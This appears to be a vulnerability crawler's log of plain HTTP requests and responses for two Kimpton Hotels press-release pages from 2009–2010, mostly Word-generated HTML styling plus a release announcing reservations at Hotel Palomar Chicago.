328713 66569 197641 328713 66569 197641 328713;}@list l4:level1 {mso-level-number-format:bullet; mso-level-text:\F0B7; mso-level-tab-stop:none; mso-level-number-position:left; text-indent:-.25in; font-family:Symbol;}@list l5 {mso-list-id:1929657465; mso-list-type:hybrid; mso-list-template-ids:1347988556 66569 197641 328713 66569 197641 328713 66569 197641 328713;}@list l5:level1 {mso-level-number-format:bullet; mso-level-text:\F0B7; mso-level-tab-stop:.5in; mso-level-number-position:left; text-indent:-.25in; font-family:Symbol;}ol {margin-bottom:0in;}ul {margin-bottom:0in;}--></style><!--[if gte mso 10]><style> /* Style Definitions */table.MsoNormalTable {mso-style-name:"Table Normal"; mso-tstyle-rowband-size:0; mso-tstyle-colband-size:0; mso-style-noshow:yes; mso-style-parent:""; mso-padding-alt:0in 5.4pt 0in 5.4pt; mso-para-margin:0in; mso-para-margin-bottom:.0001pt; mso-pagination:widow-orphan; font-size:10.0pt; font-family:"Times New Roman"; mso-ascii-font-family:Calibri; mso-hansi-font-family:Calibri;}</style><![endif]--><!--[if gte mso 9]><xml> <o:shapedefaults v:ext="edit" spidmax="2050"/></xml><![endif]--><!--[if gte mso 9]><xml> <o:shapelayout v:ext="edit"> <o:idmap v:ext="edit" data="1"/> </o:shapelayout></xml><![endif]--></head><body lang=EN-US link=blue vlink=purple style='tab-interval:.5in'><div class=Section1><p class=MsoNormal><span style='font-size:11.0pt;font-family:Arial;mso-bidi-font-family:Arial'><!--[if gte vml 1]><v:shapetype id="_x0000_t75" coordsize="21600,21600" o:spt="75" o:preferrelative="t" path="m@4@5l@4@11@9@11@9@5xe" filled="f" stroked="f"> <v:stroke joinstyle="miter"/> <v:formulas> <v:f eqn="if lineDrawn pixelLineWidth 0"/> <v:f eqn="sum @0 1 0"/> <v:f eqn="sum 0 0 @1"/> <v:f eqn="prod @2 1 2"/> <v:f eqn="prod @3 21600 pixelWidth"/> <v:f eqn="prod @3 21600 pixelHeight"/> <v:f eqn="sum @0 0 1"/> <v:f eqn="prod @6 1 2"/> <v:f eqn="prod @7 21600 pixelWidth"/> <v:f eqn="sum @8 21600 0"/> <v:f eqn="prod @7 21600 pixelHeight"/> <v:f eqn="sum @10 21600 0"/> </v:formulas> <v:path o:extrusionok="f" gradientshapeok="t" o:connecttype="rect"/> <o:lock v:ext="edit" aspectratio="t"/></v:shapetype><v:shape id="_x0000_i1025" type="#_x0000_t75" style='width:152pt; height:43pt'> <v:imagedata src="images//image001.jpg" o:title="Kimpton New Logo"/></v:shape><![endif]--><![if !vml]><img width=154 height=45src="images//image002.gif" v:shapes="_x0000_i1025"><![endif]></span></p><p class=MsoNormal><span style='font-size:8.0pt'><o:p>&nbsp;</o:p></span></p><p class=MsoNormal><b><span style='font-size:16.0pt;font-family:Arial;mso-bidi-font-family:Arial'>FOR IMMEDIATE RELEASE<o:p></o:p></span></b></p><p class=MsoNormal><b><span style='font-size:8.0pt;font-family:Arial;mso-bidi-font-family:Arial'><o:p>&nbsp;</o:p></span></b></p><p class=MsoNormal><i style='mso-bidi-font-style:normal'><spanstyle='font-size:10.0pt;mso-bidi-font-size:12.0pt;font-family:Arial;mso-bidi-font-family:Arial'>Media Contacts:</span></i><i style='mso-bidi-font-style:normal'><spanstyle='font-size:10.0pt;font-family:Arial;mso-bidi-font-family:Arial'><o:p></o:p></span></i></p><p class=MsoNormal><b><span style='font-size:10.0pt;mso-bidi-font-size:12.0pt;font-family:Arial;mso-bidi-font-family:Arial;mso-bidi-font-style:italic'>Baltz&amp; Company for Kimpton<o:p></o:p></span></b></p><p class=MsoNormal><span style='font-size:10.0pt;mso-bidi-font-size:12.0pt;font-family:Arial;mso-bidi-font-family:Arial;mso-bidi-font-style:italic'>ChloeMata Crane / 212-982-8300 x104 / <a href="mailto:cmcrane@baltzco.com">cmcrane@baltzco.com</a>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;<o:p></o:p></span></p><p class=MsoNormal><span style='font-size:10.0pt;mso-bidi-font-size:12.0pt;font-family:Arial;mso-bidi-font-family:Arial;mso-bidi-font-style:italic'>MarlieseEngel Traver / 212-982-8300 x112 / <a href="mailto:mtraver@baltzco.com">mtraver@baltzco.com</a><b><o:p></o:p></b></span></p><p class=MsoNormal><b><span style='font-size:8.0pt;font-family:Arial;mso-bidi-font-family:Arial;mso-bidi-font-style:italic'><o:p>&nbsp;</o:p></span></b></p><p class=MsoNormal><b><span style='font-size:10.0pt;mso-bidi-font-size:12.0pt;font-family:Arial;mso-bidi-font-family:Arial;mso-bidi-font-style:italic'>KimptonHotels &amp; Restaurants<o:p></o:p></span></b></p><p class=MsoNormal><span style='font-size:10.0pt;mso-bidi-font-size:12.0pt;font-family:Arial;mso-bidi-font-family:Arial;mso-bidi-font-style:italic'>StaceyEllis / 415-955-5492 / </span><a href="mailto:stacey.ellis@kimptongroup.com"><spanstyle='font-size:10.0pt;mso-bidi-font-size:12.0pt;font-family:Arial;mso-bidi-font-family:Arial;mso-bidi-font-s..
- /pdfs/press/html/Palomar-Chicago-1109/

/pdfs/press/html/Palomar-Chicago-1109/

http://www.kimptonhotels.com/pdfs/press/html/Palomar-Chicago-1109/

Request

GET /pdfs/press/html/Palomar-Chicago-1109/ HTTP/1.1
Referer: http://www.kimptonhotels.com/pdfs/press/html/Palomar-Chicago-1109/index.html
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; CloudScan Vulnerability Crawler http://cloudscan.me)
Cache-Control: no-cache
Host: www.kimptonhotels.com
Cookie: ASP.NET_SessionId=hyd2ui55rxmm2q55xslvrq55; ASPSESSIONIDAQQBQDDR=JDFEFPHBNDJFCIHIDDMHMENO
Accept-Encoding: gzip, deflate

Response

HTTP/1.1 200 OK
Date: Wed, 06 Oct 2010 02:10:54 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Content-Length: 26291
Content-Type: text/html
Cache-control: private


<html xmlns:v="urn:schemas-microsoft-com:vml"xmlns:o="urn:schemas-microsoft-com:office:office"xmlns:w="urn:schemas-microsoft-com:office:word"xmlns:m="http://schemas.microsoft.com/office/2004/12/omml"xmlns:css="http://macVmlSchemaUri" xmlns="http://www.w3.org/TR/REC-html40"><head><meta name=Title content=" "><meta name=Keywords content=""><meta http-equiv=Content-Type content="text/html; charset=macintosh"><meta name=ProgId content=Word.Document><meta name=Generator content="Microsoft Word 2008"><meta name=Originator content="Microsoft Word 2008"><link rel=File-List href="images/filelist.xml"><link rel=Edit-Time-Data href="images/editdata.mso"><!--[if !mso]><style>v\:* {behavior:url(#default#VML);}o\:* {behavior:url(#default#VML);}w\:* {behavior:url(#default#VML);}.shape {behavior:url(#default#VML);}</style><![endif]--><title> </title><!--[if gte mso 9]><xml> <o:DocumentProperties> <o:Author>scrocker</o:Author> <o:Template>Normal.dotm</o:Template> <o:LastAuthor>Marie Chen</o:LastAuthor> <o:Revision>2</o:Revision> <o:TotalTime>3</o:TotalTime> <o:LastPrinted>2009-11-05T22:56:00Z</o:LastPrinted> <o:Created>2010-02-05T00:12:00Z</o:Created> <o:LastSaved>2010-02-05T00:12:00Z</o:LastSaved> <o:Pages>1</o:Pages> <o:Words>892</o:Words> <o:Characters>5087</o:Characters> <o:Company>Kimptongroup</o:Company> <o:Lines>42</o:Lines> <o:Paragraphs>10</o:Paragraphs> <o:CharactersWithSpaces>6247</o:CharactersWithSpaces> <o:Version>12.0</o:Version> </o:DocumentProperties> <o:OfficeDocumentSettings> <o:PixelsPerInch>96</o:PixelsPerInch> <o:TargetScreenSize>800x600</o:TargetScreenSize> </o:OfficeDocumentSettings></xml><![endif]--><!--[if gte mso 9]><xml> <w:WordDocument> <w:TrackMoves>false</w:TrackMoves> <w:TrackFormatting/> <w:PunctuationKerning/> <w:ValidateAgainstSchemas/> <w:SaveIfXMLInvalid>false</w:SaveIfXMLInvalid> <w:IgnoreMixedContent>false</w:IgnoreMixedContent> <w:AlwaysShowPlaceholderText>false</w:AlwaysShowPlaceholderText> <w:Compatibility> <w:BreakWrappedTables/> <w:UseNormalStyleForList/> <w:DontUseIndentAsNumberingTabStop/> <w:DontGrowAutofit/> <w:FELineBreak11/> <w:WW11IndentRules/> <w:DontAutofitConstrainedTables/> <w:AutofitLikeWW11/> <w:HangulWidthLikeWW11/> </w:Compatibility> </w:WordDocument></xml><![endif]--><!--[if gte mso 9]><xml> <w:LatentStyles DefLockedState="false" LatentStyleCount="276"> </w:LatentStyles></xml><![endif]--><style><!-- /* Font Definitions */@font-face {font-family:Arial; panose-1:2 11 6 4 2 2 2 2 2 4; mso-font-charset:0; mso-generic-font-family:auto; mso-font-pitch:variable; mso-font-signature:3 0 0 0 16777216 0;}@font-face {font-family:"Courier New"; panose-1:2 7 3 9 2 2 5 2 4 4; mso-font-charset:0; mso-generic-font-family:auto; mso-font-pitch:variable; mso-font-signature:3 0 0 0 16777216 0;}@font-face {font-family:Wingdings; panose-1:5 2 1 2 1 8 4 8 7 8; mso-font-charset:2; mso-generic-font-family:auto; mso-font-pitch:variable; mso-font-signature:0 0 65536 0 128 0;}@font-face {font-family:Tahoma; panose-1:2 11 6 4 3 5 4 4 2 4; mso-font-charset:0; mso-generic-font-family:auto; mso-font-pitch:variable; mso-font-signature:3 0 0 0 16777216 0;} /* Style Definitions */p.MsoNormal, li.MsoNormal, div.MsoNormal {mso-style-parent:""; margin:0in; margin-bottom:.0001pt; mso-pagination:widow-orphan; font-size:12.0pt; font-family:"Times New Roman"; mso-fareast-font-family:"Times New Roman"; mso-bidi-font-family:"Times New Roman";}p.MsoCommentText, li.MsoCommentText, div.MsoCommentText {mso-style-noshow:yes; margin:0in; margin-bottom:.0001pt; mso-pagination:widow-orphan; font-size:10.0pt; font-family:"Times New Roman"; mso-fareast-font-family:"Times New Roman"; mso-bidi-font-family:"Times New Roman";}p.MsoHeader, li.MsoHeader, div.MsoHeader {margin:0in; margin-bottom:.0001pt; mso-pagination:widow-orphan; tab-stops:center 3.0in right 6.0in; font-size:12.0pt; font-family:"Times New Roman"; mso-fareast-font-family:"Times New Roman"; mso-bidi-font-family:"Times New Roman";}p.MsoFooter, li.MsoFooter, div.MsoFooter {margin:0in; margin-bottom:.0001pt; mso-pagination:widow-orphan; tab-stops:center 3.0in right 6.0in; font-size:12.0pt; font-family:"Times New Roman"; mso-fareast-font-family:"Times New Roman"; mso-bidi-font-family:"Times New Roman";}span.MsoCommentReference {mso-style-noshow:yes; mso-ansi-font-size:8.0pt; mso-bidi-font-size:8.0pt;}a:link, span.MsoHyperlink {font-family:"Times New Roman"; mso-bidi-font-family:"Times New Roman"; color:blue; text-decoration:underline; text-underline:single;}a:visited, span.MsoHyperlinkFollowed {color:purple; text-decoration:underline; text-underline:single;}strong {mso-bidi-font-weight:bold;}p.MsoCommentSubject, li.MsoCommentSubject, div.MsoCommentSubject {mso-style-noshow:yes; mso-style-parent:"Comment Text"; mso-style-next:"Comment Text"; margin:0in; margin-bottom:.0001pt; mso-pagination:widow-orphan; font-size:10.0pt; font-family:"Times New Roman"; mso-fareast-font-family:"Times New Roman"; mso-bidi-font-family:"Times New Roman"; font-weight:bold;}p.MsoAcetate, li.MsoAcetate, div.MsoAcetate {mso-style-noshow:yes; margin:0in; margin-bottom:.0001pt; mso-pagination:widow-orphan; font-size:8.0pt; font-family:Tahoma; mso-fareast-font-family:"Times New Roman"; mso-bidi-font-family:Tahoma;}span.QC {mso-style-name:QC; mso-style-noshow:yes; mso-ansi-font-size:10.0pt; mso-bidi-font-size:10.0pt; font-family:Arial; mso-ascii-font-family:Arial; mso-hansi-font-family:Arial; mso-bidi-font-family:Arial; color:navy;} /* Page Definitions */@page {mso-footnote-separator:url(":images:header.htm") fs; mso-footnote-continuation-separator:url(":images:header.htm") fcs; mso-endnote-separator:url(":images:header.htm") es; mso-endnote-continuation-separator:url(":images:header.htm") ecs;}@page Section1 {size:8.5in 11.0in; margin:1.0in 1.0in 1.0in 1.0in; mso-header-margin:.5in; mso-footer-margin:.5in; mso-footer:url(":images:header.htm") f1; mso-paper-source:0;}div.Section1 {page:Section1;} /* List Definitions */@list l0 {mso-list-id:83496818; mso-list-type:hybrid; mso-list-template-ids:-1664608870 66569 197641 328713 66569 197641 328713 66569 197641 328713;}@list l0:level1 {mso-level-number-format:bullet; mso-level-text:\F0B7; mso-level-tab-stop:.5in; mso-level-number-position:left; text-indent:-.25in; font-family:Symbol;}@list l1 {mso-list-id:114837897; mso-list-type:hybrid; mso-list-template-ids:-1807987590 66569 197641 328713 66569 197641 328713 66569 197641 328713;}@list l1:level1 {mso-level-number-format:bullet; mso-level-text:\F0B7; mso-level-tab-stop:.5in; mso-level-number-position:left; text-indent:-.25in; font-family:Symbol;}@list l1:level2 {mso-level-number-format:bullet; mso-level-text:o; mso-level-tab-stop:1.0in; mso-level-number-position:left; text-indent:-.25in; font-family:"Courier New"; mso-bidi-font-family:Arial;}@list l2 {mso-list-id:174004372; mso-list-type:hybrid; mso-list-template-ids:682938596 -134842562 197641 328713 66569 197641 328713 66569 197641 328713;}@list l2:level1 {mso-level-number-format:bullet; mso-level-text:\F0B7; mso-level-tab-stop:.5in; mso-level-number-position:left; text-indent:-.25in; font-family:Symbol; color:windowtext;}@list l3 {mso-list-id:501547045; mso-list-type:hybrid; mso-list-template-ids:-1916140730 66569 197641 328713 66569 197641 328713 66569 197641 328713;}@list l3:level1 {mso-level-number-format:bullet; mso-level-text:\F0B7; mso-level-tab-stop:.5in; mso-level-number-position:left; text-indent:-.25in; font-family:Symbol;}@list l4 {mso-list-id:1025711067; mso-list-type:hybrid; mso-list-template-ids:-1054056796 66569 197641 328713 66569 197641 328713 66569 197641 328713;}@list l4:level1 {mso-level-number-format:bullet; mso-level-text:\F0B7; mso-level-tab-stop:.5in; mso-level-number-position:left; text-indent:-.25in; font-family:Symbol;}@list l5 {mso-list-id:1092357548; mso-list-type:hybrid; mso-list-template-ids:1250087272 66569 197641 328713 66569 197641 328713 66569 197641 328713;}@list l5:level1 {mso-level-number-format:bullet; mso-level-text:\F0B7; mso-level-tab-stop:.5in; mso-level-number-position:left; text-indent:-.25in; font-family:Symbol;}@list l5:level2 {mso-level-number-format:bullet; mso-level-text:o; mso-level-tab-stop:1.0in; mso-level-number-position:left; text-indent:-.25in; font-family:"Courier New"; mso-bidi-font-family:Arial;}ol {margin-bottom:0in;}ul {margin-bottom:0in;}--></style><!--[if gte mso 10]><style> /* Style Definitions */table.MsoNormalTable {mso-style-name:"Table Normal"; mso-tstyle-rowband-size:0; mso-tstyle-colband-size:0; mso-style-noshow:yes; mso-style-parent:""; mso-padding-alt:0in 5.4pt 0in 5.4pt; mso-para-margin:0in; mso-para-margin-bottom:.0001pt; mso-pagination:widow-orphan; font-size:10.0pt; font-family:"Times New Roman";}</style><![endif]--><!--[if gte mso 9]><xml> <o:shapedefaults v:ext="edit" spidmax="2050"/></xml><![endif]--><!--[if gte mso 9]><xml> <o:shapelayout v:ext="edit"> <o:idmap v:ext="edit" data="1"/> </o:shapelayout></xml><![endif]--></head><body lang=EN-US link=blue vlink=purple style='tab-interval:.5in'><div class=Section1><p class=MsoNormal align=center style='text-align:center'><!--[if gte vml 1]><v:shapetype id="_x0000_t75" coordsize="21600,21600" o:spt="75" o:preferrelative="t" path="m@4@5l@4@11@9@11@9@5xe" filled="f" stroked="f"> <v:stroke joinstyle="miter"/> <v:formulas> <v:f eqn="if lineDrawn pixelLineWidth 0"/> <v:f eqn="sum @0 1 0"/> <v:f eqn="sum 0 0 @1"/> <v:f eqn="prod @2 1 2"/> <v:f eqn="prod @3 21600 pixelWidth"/> <v:f eqn="prod @3 21600 pixelHeight"/> <v:f eqn="sum @0 0 1"/> <v:f eqn="prod @6 1 2"/> <v:f eqn="prod @7 21600 pixelWidth"/> <v:f eqn="sum @8 21600 0"/> <v:f eqn="prod @7 21600 pixelHeight"/> <v:f eqn="sum @10 21600 0"/> </v:formulas> <v:path o:extrusionok="f" gradientshapeok="t" o:connecttype="rect"/> <o:lock v:ext="edit" aspectratio="t"/></v:shapetype><v:shape id="_x0000_s1027" type="#_x0000_t75" style='position:absolute; left:0;text-align:left;margin-left:162pt;margin-top:-36pt;width:147pt; height:66pt;z-index:-251658752' wrapcoords="-110 0 -110 21355 21600 21355 21600 0 -110 0"> <v:imagedata src="images/image001.jpg" o:title="Palomar Chicago Hotel Glow 1c Invert"/> <w:wrap type="tight"/></v:shape><![endif]--><![if !vml]><img width=149 height=68src="images/image002.gif" align=right hspace=9 v:shapes="_x0000_s1027"><![endif]></p><p class=MsoNormal><i style='mso-bidi-font-style:normal'><spanstyle='font-size:10.0pt;font-family:Arial;mso-bidi-font-family:Arial'><o:p>&nbsp;</o:p></span></i></p><p class=MsoNormal><i style='mso-bidi-font-style:normal'><spanstyle='font-size:10.0pt;font-family:Arial;mso-bidi-font-family:Arial'>MediaContacts:<o:p></o:p></span></i></p><p class=MsoNormal><b style='mso-bidi-font-weight:normal'><i style='mso-bidi-font-style:normal'><span style='font-size:10.0pt;font-family:Arial;mso-bidi-font-family:Arial'>Quinn &amp; Co. <o:p></o:p></span></i></b></p><p class=MsoNormal><i style='mso-bidi-font-style:normal'><spanstyle='font-size:10.0pt;font-family:Arial;mso-bidi-font-family:Arial'>NicoleRuggiero / 212-868-1900 x248 / </span></i><span style='font-size:10.0pt'><ahref="mailto:nruggiero@quinnandco.com"><i style='mso-bidi-font-style:normal'><spanstyle='font-family:Arial;mso-bidi-font-family:Arial'>nruggiero@quinnandco.com</span></i></a></span><istyle='mso-bidi-font-style:normal'><span style='font-size:10.0pt;font-family:Arial;mso-bidi-font-family:Arial'><o:p></o:p></span></i></p><p class=MsoNormal><i style='mso-bidi-font-style:normal'><span lang=DEstyle='font-size:10.0pt;font-family:Arial;mso-bidi-font-family:Arial;mso-ansi-language:DE'>Leslie Dewees / 212-868-1900 x357/ </span></i><spanlang=DE style='font-size:10.0pt;font-family:Arial;mso-bidi-font-family:Arial;mso-ansi-language:DE;mso-ansi-font-style:italic'><ahref="mailto:ldewees@quinnandco.com"><i style='mso-bidi-font-style:normal'><spanstyle='mso-bidi-font-family:Arial'>ldewees@quinnandco.com</span></i></a><istyle='mso-bidi-font-style:normal'> <span style="mso-spacerun:yes">&nbsp;</span><o:p></o:p></i></span></p><p class=MsoNormal><b style='mso-bidi-font-weight:normal'><i style='mso-bidi-font-style:normal'><span style='font-size:10.0pt;font-family:Arial;mso-bidi-font-family:Arial'>Chicago Kimpton Hotels<o:p></o:p></span></i></b></p><p class=MsoNormal><i style='mso-bidi-font-style:normal'><span lang=FRstyle='font-size:10.0pt;font-family:Arial;mso-bidi-font-family:Arial;mso-ansi-language:FR'>Jennifer Navarro /312-325-7188 </span></i><span lang=FRstyle='font-size:10.0pt;font-family:Arial;mso-bidi-font-family:Arial;mso-ansi-language:FR;mso-ansi-font-style:italic'><ahref="file://localhost/jennifer.navarro@kimptonhotels.com"><i style='mso-bidi-font-style:normal'><span style='mso-bidi-font-family:Arial'>/jennifer.navarro@kimptonhotels.com</span></i></a><istyle='mso-bidi-font-style:normal'> <o:p></o:p></i></span></p><p class=MsoNormal><i style='mso-bidi-font-style:normal'><span lang=FRstyle='font-size:10.0pt;font-family:Arial;mso-bidi-font-family:Arial;mso-ansi-language:FR'><o:p>&nbsp;</o:p></span></i></p><p class=MsoNormal><span lang=FR style='font-size:10.0pt;font-family:Arial;mso-bidi-font-family:Arial;mso-ansi-language:FR'><o:p>&nbsp;</o:p></span></p><p class=MsoNormal align=center style='text-align:center'><b style='mso-bidi-font-weight:normal'><span style='font-family:Arial;mso-bidi-font-family:Arial'>RESERVATIONSNOW ACCEPTED FOR <o:p></o:p></span></b></p><p class=MsoNormal align=center style='text-align:center'><b style='mso-bidi-font-weight:normal'><span style='font-family:Arial;mso-bidi-font-family:Arial'>KIMPTON�SNEW HOTEL PALOMAR CHICAGO </span></b><i style='mso-bidi-font-style:normal'><spanstyle='font-family:Arial;mso-bidi-font-family:Arial'><o:p></o:p></span></i></p><p class=MsoNormal align=center style='text-align:center'><i style='mso-bidi-font-style:normal'><span style='font-family:Arial;mso-bidi-font-family:Arial'><o:p>&nbsp;</o:p></span></i></p><p class=MsoNormal align=center style='text-align:center'><i style='mso-bidi-font-style:normal'><span style='font-family:Arial;mso-bidi-font-family:Arial'>EvolvedBoutique Concept in River North Community Features Art Theme, <o:p></o:p></span></i></p><p class=MsoNormal align=center style='text-align:center'><i style='mso-bidi-font-style:normal'><span style='font-family:Arial;mso-bidi-font-family:Arial'>RooftopIndoor Pool and Heartfelt Customer Care<o:p></o:p></span></i></p><p class=MsoNormal style='text-align:justify;line-height:150%;mso-layout-grid-align:none;text-autospace:none'><b style='mso-bidi-font-weight:normal'><spanstyle='font-size:11.0pt;line-height:150%;font-family:Arial;mso-bidi-font-family:Arial'><o:p>&nbsp;</o:p></span></b></p><p class=MsoNormal style='text-align:justify;line-height:150%'><bstyle='mso-bidi-font-weight:normal'><span style='font-size:11.0pt;line-height:150%;font-family:Arial;mso-bidi-font-family:Arial'>CHICAGO &#8211; Nov. 16, 2009</span></b><spanstyle='font-size:11.0pt;line-height:150%;font-family:Arial;mso-bidi-font-family:Arial'> <b style='mso-bidi-font-weight:normal'>&#8211;</b> Reservations are nowbeing accepted for May 1, 2010 arrivals at Kimpton�s new Hotel Palomar Chicago,which will open this spring in the vibrant River North neighborhood as anart-centric addition to the company�s Windy City collection.<spanstyle="mso-spacerun: yes">&nbsp; </span>Special pre-opening group ratesstarting at $99, and pre-opening leisure packages starting at $89, can bebooked online at <a href="http://www.hotelpalomar-chicago.com/"><spanstyle='mso-bidi-font-family:Arial'>www.hotelpalomar-chicago.com</span></a>. <o:p></o:p></span></p><p class=MsoNormal style='text-align:justify;line-height:150%;mso-layout-grid-align:none;text-autospace:none'><span style='font-size:11.0pt;line-height:150%;font-family:Arial;mso-bidi-font-family:Arial'><o:p>&nbsp;</o:p></span></p><p class=MsoNormal style='text-align:justify;line-height:150%;mso-layout-grid-align:none;text-autospace:none'><span style='font-size:11.0pt;line-height:150%;font-family:Arial;mso-bidi-font-family:Arial'>The 261-room art-themed hotelmarks an evolution in the city�s boutique scene with show-stopping design andd�cor by Orlando Diaz-Azcuy, an indoor rooftop pool, brilliantly positioned tooffer expansive views of the city�s southeast landscape, and a green roof.<spanstyle="mso-spacerun: yes">&nbsp; </span>With the new hotel also comes theKimpton promise of a <span style='color:black'>genuine and personalizedapproach to making guests feel comfortable and cared for. </span>�The HotelPalomar will introduce an original perspective on Chicago hospitality,� saidNabil Moubayed, general manager.<span style="mso-spacerun: yes">&nbsp;</span>�The hotel conveys an inviting presence, with a sophisticated yetimaginative experience, that aims to invigorate everyone who..
- /pdfs/press/html/Nature-Conservancy-1009/index.html

/pdfs/press/html/Nature-Conservancy-1009/index.html

http://www.kimptonhotels.com/pdfs/press/html/Nature-Conservancy-1009/index.html

Request

GET /pdfs/press/html/Nature-Conservancy-1009/index.html HTTP/1.1
Referer: http://www.kimptonhotels.com/about-us/press-releases.aspx
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; CloudScan Vulnerability Crawler http://cloudscan.me)
Cache-Control: no-cache
Host: www.kimptonhotels.com
Cookie: ASP.NET_SessionId=hyd2ui55rxmm2q55xslvrq55; ASPSESSIONIDAQQBQDDR=JDFEFPHBNDJFCIHIDDMHMENO
Accept-Encoding: gzip, deflate

Response

HTTP/1.1 200 OK
Date: Wed, 06 Oct 2010 02:10:54 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Content-Length: 31549
Content-Type: text/html
Cache-control: private


<html xmlns:v="urn:schemas-microsoft-com:vml"
xmlns:o="urn:schemas-microsoft-com:office:office"
xmlns:w="urn:schemas-microsoft-com:office:word"
xmlns:m="http://schemas.microsoft.com/office/2004/12/omml"
xmlns:css="http://macVmlSchemaUri" xmlns="http://www.w3.org/TR/REC-html40">

<head>
<meta name=Title content=" ">
<meta name=Keywords content="">
<meta http-equiv=Content-Type content="text/html; charset=macintosh">
<meta name=ProgId content=Word.Document>
<meta name=Generator content="Microsoft Word 2008">
<meta name=Originator content="Microsoft Word 2008">
<link rel=File-List href="images/filelist.xml">
<link rel=Edit-Time-Data href="images/editdata.mso">
<link rel=OLE-Object-Data href="images/oledata.mso">
<!--[if !mso]>
<style>
v\:* {behavior:url(#default#VML);}
o\:* {behavior:url(#default#VML);}
w\:* {behavior:url(#default#VML);}
.shape {behavior:url(#default#VML);}
</style>
<![endif]-->
<title> </title>
<!--[if gte mso 9]><xml>
<o:DocumentProperties>
<o:Author>Marliese Engel</o:Author>
<o:Template>Normal.dotm</o:Template>
<o:LastAuthor>Marie Chen</o:LastAuthor>
<o:Revision>2</o:Revision>
<o:TotalTime>3</o:TotalTime>
<o:LastPrinted>2009-08-04T19:42:00Z</o:LastPrinted>
<o:Created>2009-10-07T22:47:00Z</o:Created>
<o:LastSaved>2009-10-07T22:47:00Z</o:LastSaved>
<o:Pages>1</o:Pages>
<o:Words>928</o:Words>
<o:Characters>5292</o:Characters>
<o:Company>Baltz &amp; Company</o:Company>
<o:Lines>44</o:Lines>
<o:Paragraphs>10</o:Paragraphs>
<o:CharactersWithSpaces>6498</o:CharactersWithSpaces>
<o:Version>12.0</o:Version>
</o:DocumentProperties>
<o:OfficeDocumentSettings>
<o:PixelsPerInch>96</o:PixelsPerInch>
<o:TargetScreenSize>800x600</o:TargetScreenSize>
</o:OfficeDocumentSettings>
</xml><![endif]--><!--[if gte mso 9]><xml>
<w:WordDocument>
<w:TrackMoves>false</w:TrackMoves>
<w:TrackFormatting/>
<w:PunctuationKerning/>
<w:ValidateAgainstSchemas/>
<w:SaveIfXMLInvalid>false</w:SaveIfXMLInvalid>
<w:IgnoreMixedContent>false</w:IgnoreMixedContent>
<w:AlwaysShowPlaceholderText>false</w:AlwaysShowPlaceholderText>
<w:Compatibility>
<w:BreakWrappedTables/>
<w:UseNormalStyleForList/>
<w:DontUseIndentAsNumberingTabStop/>
<w:DontGrowAutofit/>
<w:FELineBreak11/>
<w:WW11IndentRules/>
<w:DontAutofitConstrainedTables/>
<w:AutofitLikeWW11/>
<w:HangulWidthLikeWW11/>
</w:Compatibility>
</w:WordDocument>
</xml><![endif]--><!--[if gte mso 9]><xml>
<w:LatentStyles DefLockedState="false" LatentStyleCount="276">
</w:LatentStyles>
</xml><![endif]-->
<style>
<!--
/* Font Definitions */
@font-face
{font-family:Arial;
panose-1:2 11 6 4 2 2 2 2 2 4;
mso-font-charset:0;
mso-generic-font-family:auto;
mso-font-pitch:variable;
mso-font-signature:3 0 0 0 16777216 0;}
@font-face
{font-family:"Courier New";
panose-1:2 7 3 9 2 2 5 2 4 4;
mso-font-charset:0;
mso-generic-font-family:auto;
mso-font-pitch:variable;
mso-font-signature:3 0 0 0 16777216 0;}
@font-face
{font-family:Times;
panose-1:2 0 5 0 0 0 0 0 0 0;
mso-font-charset:0;
mso-generic-font-family:auto;
mso-font-pitch:variable;
mso-font-signature:3 0 0 0 16777216 0;}
@font-face
{font-family:Wingdings;
panose-1:5 2 1 2 1 8 4 8 7 8;
mso-font-charset:2;
mso-generic-font-family:auto;
mso-font-pitch:variable;
mso-font-signature:0 0 65536 0 128 0;}
@font-face
{font-family:Calibri;
panose-1:2 15 5 2 2 2 4 3 2 4;
mso-font-charset:0;
mso-generic-font-family:auto;
mso-font-pitch:variable;
mso-font-signature:3 0 0 0 16777216 0;}
@font-face
{font-family:Tahoma;
panose-1:2 11 6 4 3 5 4 4 2 4;
mso-font-charset:0;
mso-generic-font-family:auto;
mso-font-pitch:variable;
mso-font-signature:3 0 0 0 16777216 0;}
@font-face
{font-family:"Arial Unicode MS";
mso-font-charset:128;
mso-generic-font-family:swiss;
mso-font-pitch:variable;
mso-font-signature:-1 -23 1056964608 0 -16695552 0;}
@font-face
{font-family:Consolas;
panose-1:2 11 6 9 2 2 4 3 2 4;
mso-font-charset:0;
mso-generic-font-family:auto;
mso-font-pitch:variable;
mso-font-signature:3 0 0 0 16777216 0;}
/* Style Definitions */
p.MsoNormal, li.MsoNormal, div.MsoNormal
{mso-style-parent:"";
margin:0in;
margin-bottom:.0001pt;
mso-pagination:widow-orphan;
font-size:11.0pt;
font-family:"Times New Roman";
mso-ascii-font-family:Calibri;
mso-fareast-font-family:Calibri;
mso-hansi-font-family:Calibri;
mso-bidi-font-family:"Times New Roman";}
h1
{mso-style-link:"Heading 1 Char";
mso-margin-top-alt:auto;
margin-right:0in;
mso-margin-bottom-alt:auto;
margin-left:0in;
mso-pagination:widow-orphan;
mso-outline-level:1;
font-size:24.0pt;
mso-bidi-font-size:10.0pt;
font-family:"Times New Roman";
mso-ascii-font-family:"Arial Unicode MS";
mso-fareast-font-family:"Arial Unicode MS";
mso-hansi-font-family:"Arial Unicode MS";}
p.MsoCommentText, li.MsoCommentText, div.MsoCommentText
{mso-style-noshow:yes;
margin:0in;
margin-bottom:.0001pt;
mso-pagination:widow-orphan;
font-size:10.0pt;
font-family:"Times New Roman";
mso-ascii-font-family:Calibri;
mso-fareast-font-family:Calibri;
mso-hansi-font-family:Calibri;
mso-bidi-font-family:"Times New Roman";}
